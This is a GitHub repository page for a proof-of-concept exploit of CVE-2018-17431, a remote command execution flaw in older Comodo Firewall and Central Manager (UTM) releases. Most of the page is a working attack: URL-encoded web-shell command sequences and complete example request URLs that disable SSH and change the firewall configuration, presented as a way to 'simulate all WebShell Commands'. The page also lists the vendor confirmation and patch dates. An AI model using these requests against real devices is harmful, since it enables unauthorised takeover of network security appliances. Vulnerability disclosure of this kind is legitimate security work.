Skip to content

Fadavvi/CVE-2018-17431-PoC

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2018-17431-PoC

Proof of consept for CVE-2018-17431

Exploit Title: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Command Execution (Web Shell based)

Exploit Author: Milad Fadavvi

Vendor Homepage: https://www.comodo.com/

Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Version: before 2.7.0 & 1.5.0

Tested on: Windows:firefox/chrome - Kali:firefox

Discovery Date: 2018-08-15 (reported in sameday)

Confirmation than bug exist: 2018-09-22 (Ticket ID: XWR-503-79437)

Patch released: 2018-11-23 Release Notes from Comodo

Exploit:

  1. WebShell simulation:

     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Encode

     make above sequense encode with URL ECODING
     (I used burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Run

     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

A page with "Configuration has been altered" message will show up and configuration changed!

With this technic, we can simulate all WebShell Commands.